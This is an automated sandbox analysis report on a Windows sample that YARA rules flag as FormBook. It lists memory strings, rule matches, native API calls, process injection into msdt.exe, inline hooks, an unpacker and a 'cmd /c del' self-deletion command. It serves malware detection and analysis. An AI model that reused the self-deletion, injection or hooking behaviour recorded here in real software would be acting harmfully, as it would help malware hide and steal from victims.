          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A050 NtClose,
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00419F20 NtCreateFile,
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00419FD0 NtReadFile,
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041A0FA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0500A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05009A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A050 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03019F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03019FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301A0FA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_009D9013
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524C62C
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524E8A0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_0524E890
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C99A0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0D70
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0D80
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0B18
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 0_2_060C0B28
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00401030
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D28D
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041E407
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D53D
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00402D90
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409E2B
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00409E30
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00402FB0
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00B59013
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092D07
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05091D55
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050925DD
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FD841F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDD5E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508D466
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF2581
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FC0D20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE6E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05091FF1
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508D616
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092EF7
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FF20A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FDB090
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05081002
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050920A8
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FE4120
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050928EC
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FCF900
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_05092B28
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0508DBD2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04FFEBB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_050922AE
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D28D
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03001030
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03002FB0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03009E2B
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03009E30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03002D90
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301E407
          Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04FCB150 appears 35 times
          Source: SKM_C36821010708320.exe, 00000000.00000002.238052275.0000000006050000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000000.00000000.216347265.0000000000A92000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000000.230956986.0000000000C12000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemsdt.exej% vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exeBinary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
          Source: SKM_C36821010708320.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@5/5
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SKM_C36821010708320.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4548:120:WilError_01
          Source: SKM_C36821010708320.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: SKM_C36821010708320.exeReversingLabs: Detection: 28%
          Source: unknownProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess created: C:\Users\user\Desktop\SKM_C36821010708320.exe C:\Users\user\Desktop\SKM_C36821010708320.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SKM_C36821010708320.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: SKM_C36821010708320.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SKM_C36821010708320.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
          Source: Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: SKM_C36821010708320.exe, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.SKM_C36821010708320.exe.9d0000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.SKM_C36821010708320.exe.b50000.1.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.0.SKM_C36821010708320.exe.b50000.0.unpack, LoaderInformation.cs.Net Code: SafeFileMappingHandle System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D075 push eax; ret
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D0C2 push eax; ret
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D0CB push eax; ret
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00408171 pushfd ; retf
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_0041D12C push eax; ret
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00417206 push es; iretd
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00406C46 push edi; iretd
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_00417F59 push edi; retf
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeCode function: 2_2_004167AE push 0000003Ah; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0501D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03017206 push es; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D12C push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03008171 pushfd ; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D075 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D0C2 push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0301D0CB push eax; ret
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03017F59 push edi; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_030167AE push 0000003Ah; retf
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03006C46 push edi; iretd
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_03000C7A push ebp; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.22890252229

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SKM_C36821010708320.exeProcess information set: NOOPENFILEERRORBOX
